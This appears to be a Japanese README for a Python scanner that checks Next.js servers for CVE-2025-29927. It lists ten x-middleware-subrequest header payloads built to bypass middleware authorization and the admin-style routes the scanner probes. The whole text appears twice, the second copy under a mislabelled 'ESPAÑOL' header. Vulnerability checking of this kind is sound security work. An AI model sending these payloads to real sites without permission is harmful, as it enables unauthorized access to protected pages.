
このスクリプトは、Next.js サーバーにおける CVE-2025-29927 の脆弱性を確認し、`x-middleware-subrequest` ヘッダーに複数のペイロードを送信して、認可されていないアクセスを検出します。
CVE-2025-29927 チェッカー
📌 はじめに
このスクリプトは、Next.js サーバーにおける CVE-2025-29927 脆弱性をチェックするために、x-middleware-subrequest ヘッダーに複数のペイロードを送信し、認証なしでの機密ルートへのアクセスを検出します。
❓ CVE-2025-29927 とは?
CVE-2025-29927 は、Next.js のセキュリティ制限をバイパスし、認証なしで機密ルートへのアクセスを可能にする脆弱性です。
⚙️ スクリプトの動作
🔹 1. ライブラリのインポート
このスクリプトは以下を使用します:
🛠️ argparse - 引数の処理用
🌐 requests - HTTP リクエスト送信用
⏳ time - テスト間の待機用
🎨 colorama - コンソール出力に色を付けるため
🔹 2. ペイロードリスト
スクリプトは、セキュリティ制限をバイパスするために設計された複数のペイロードを x-middleware-subrequest に対してテストします。例:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. 機密ルート
スクリプトは、以下のようなパスに対するレスポンスを分析します:
/admin, /dashboard, /settings, /private, /config
🔹 4. スキャンプロセス
✅ コンソールにバナーを表示します。
✅ 異なるペイロードで HTTP リクエストを送信します。
✅ サーバーが Next.js を使用しているか確認します。
✅ 機密ルートへのアクセスを検出し、脆弱性を報告します。
🔹 5. エラーハンドリング
スクリプトは例外を処理し、接続障害による中断を防ぎます。
🚀 使用例
スクリプトを実行:
python script.py -t https://example.com/api/auth
📢 免責事項
このツールは、倫理的なテストと許可された使用のみを目的としています。許可なくサードパーティのシステムに対して使用することは違法です。
===================ESPAÑOL===================
CVE-2025-29927 チェッカー
📌 はじめに
このスクリプトは、Next.js サーバーにおける CVE-2025-29927 脆弱性をチェックするために、x-middleware-subrequest ヘッダーに複数のペイロードを送信し、認証なしでの機密ルートへのアクセスを検出します。
❓ CVE-2025-29927 とは?
CVE-2025-29927 は、Next.js のセキュリティ制限をバイパスし、認証なしで機密ルートへのアクセスを可能にする脆弱性です。
⚙️ スクリプトの動作
🔹 1. ライブラリのインポート
このスクリプトは以下を使用します:
🛠️ argparse - 引数の処理用
🌐 requests - HTTP リクエスト送信用
⏳ time - テスト間の待機用
🎨 colorama - コンソール出力に色を付けるため
🔹 2. ペイロードリスト
スクリプトは、セキュリティ制限をバイパスするために設計された複数のペイロードを x-middleware-subrequest に対してテストします。例:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. 機密ルート
スクリプトは、以下のようなパスに対するレスポンスを分析します:
/admin, /dashboard, /settings, /private, /config
🔹 4. スキャンプロセス
✅ コンソールにバナーを表示します。
✅ 異なるペイロードで HTTP リクエストを送信します。
✅ サーバーが Next.js を使用しているか確認します。
✅ 機密ルートへのアクセスを検出し、脆弱性を報告します。
🔹 5. エラーハンドリング
スクリプトは例外を処理し、接続障害による中断を防ぎます。
🚀 使用例
スクリプトを実行:
python script.py -t https://example.com/api/auth
📢 免責事項
このツールは、倫理的なテストと許可された使用のみを目的としています。許可なくサードパーティのシステムに対して使用することは違法です。